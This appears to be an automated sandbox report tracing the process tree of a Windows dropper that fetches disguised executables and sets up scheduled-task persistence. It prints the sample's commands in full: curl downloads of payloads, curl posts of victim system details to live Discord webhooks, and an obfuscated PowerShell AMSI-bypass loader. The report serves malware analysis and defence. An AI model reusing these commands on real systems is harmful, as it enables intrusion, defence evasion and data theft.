1964 wrote to memory of 4216 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 4216 1964 Dropper.exe cmd.exe PID 4216 wrote to memory of 700 4216 cmd.exe curl.exe PID 4216 wrote to memory of 700 4216 cmd.exe curl.exe PID 4216 wrote to memory of 700 4216 cmd.exe curl.exe PID 1964 wrote to memory of 1736 1964 Dropper.exe $77-penisballs.exe PID 1964 wrote to memory of 1736 1964 Dropper.exe $77-penisballs.exe PID 1964 wrote to memory of 3804 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3804 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 3804 1964 Dropper.exe cmd.exe PID 3804 wrote to memory of 5104 3804 cmd.exe curl.exe PID 3804 wrote to memory of 5104 3804 cmd.exe curl.exe PID 3804 wrote to memory of 5104 3804 cmd.exe curl.exe PID 2316 wrote to memory of 1696 2316 $77-aachost.exe cmd.exe PID 2316 wrote to memory of 1696 2316 $77-aachost.exe cmd.exe PID 2316 wrote to memory of 2524 2316 $77-aachost.exe cmd.exe PID 2316 wrote to memory of 2524 2316 $77-aachost.exe cmd.exe PID 2524 wrote to memory of 4988 2524 cmd.exe timeout.exe PID 2524 wrote to memory of 4988 2524 cmd.exe timeout.exe PID 1696 wrote to memory of 2668 1696 cmd.exe schtasks.exe PID 1696 wrote to memory of 2668 1696 cmd.exe schtasks.exe PID 4304 wrote to memory of 4860 4304 $77-sdchost.exe schtasks.exe PID 4304 wrote to memory of 4860 4304 $77-sdchost.exe schtasks.exe PID 2524 wrote to memory of 2236 2524 cmd.exe $77-aachost.exe PID 2524 wrote to memory of 2236 2524 cmd.exe $77-aachost.exe PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe PID 1964 wrote to memory of 1396 1964 Dropper.exe $77-install.exe PID 1964 wrote to memory of 2980 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 2980 1964 Dropper.exe cmd.exe PID 1964 wrote to memory of 2980 1964 Dropper.exe cmd.exe PID 2980 wrote to memory of 4696 2980 cmd.exe curl.exe PID 2980 wrote to memory of 4696 2980 cmd.exe curl.exe PID 2980 wrote to memory of 4696 2980 cmd.exe curl.exe PID 4396 wrote to memory of 1068 4396 cmd.exe curl.exe PID 4396 wrote to memory of 1068 4396 cmd.exe curl.exe PID 1308 wrote to memory of 1724 1308 powershell.EXE dllhost.exe PID 1308 wrote to memory of 1724 1308 powershell.EXE dllhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{27885a73-c420-4253-ae9c-f13098271dfd}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp58D9.tmp.bat""4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UAuQcJGKypGD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yYJLRqLEqRoUcH,[Parameter(Position=1)][Type]$QTNCgivVQc)$sVLBoVxAEhm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+',P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sVLBoVxAEhm.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+'g'+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yYJLRqLEqRoUcH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$sVLBoVxAEhm.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$QTNCgivVQc,$yYJLRqLEqRoUcH).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $sVLBoVxAEhm.CreateType();}$LUfPqQffFqxox=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'te'+'m'+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+'i'+'cros'+'o'+'ft'+'.'+''+[Char](87)+''+'i'+'n32'+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+'et'+'h'+''+'o'+''+'d'+''+'s'+'');$aXaWoJrtimlFtD=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qUZmQBWBRRVNkYkQgdk=UAuQcJGKypGD @([String])([IntPtr]);$ToChBmRYHztiJRtioFpvSu=UAuQcJGKypGD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZzQuQiIppNe=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lDbCmJxOGgFUAP=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'rary'+[Char](65)+'')));$tAAdNBwavZOaSfhYg=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'alPr'+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$jvOJQge=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lDbCmJxOGgFUAP,$qUZmQBWBRRVNkYkQgdk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$QfynZrrWdLekAewLH=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$jvOJQge,[Object]('Am'+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+[Char](102)+''+'e'+''+'r'+'')));$bKOIucZbAQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,4,[ref]$bKOIucZbAQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QfynZrrWdLekAewLH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,0x20,[ref]$bKOIucZbAQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\$77-aachost.exe"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
